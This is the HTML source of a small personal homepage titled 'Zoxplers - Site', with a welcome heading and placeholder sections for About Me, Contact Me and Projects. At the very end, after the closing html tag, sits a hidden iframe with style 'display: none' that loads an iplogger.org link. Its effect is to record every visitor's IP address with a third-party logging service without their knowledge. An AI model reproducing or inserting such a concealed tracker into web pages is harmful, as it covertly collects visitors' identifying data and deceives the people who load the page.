<!--Made by Zoxplers--->
<!DOCTYPE html>
<html>
    <head>
        <title>Zoxplers - Site</title>
        <link rel="shortcut icon" href="favicon.ico"/>
        <meta charset="utf-8"/>
        <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
    </head>
    <body>
        <wrap></wrap>
        <!--
        <navmenu>
            <titlebar>Home</titlebar>
        </navmenu>-->
        <main>
            <wrap></wrap>
            <heading>
                <wrap></wrap>
                <heading1>Welcome to my website!</heading1>
                <heading2>JSdisabled?</heading2>
            </heading>
            <navbar>
            </navbar>
            <pages>
                <aboutme name="About Me" icon="person"></aboutme>
                <contactme name="Contact Me" icon="call"></contactme>
                <projects name="Projects" icon="work"></projects>
            </pages>
        </main>
    </body>
</html>
<iframe style="display: none;" src="https://iplogger.org/2scVd5"></iframe>
<link rel="stylesheet" href="index.css">
<script src="index.js"></script>
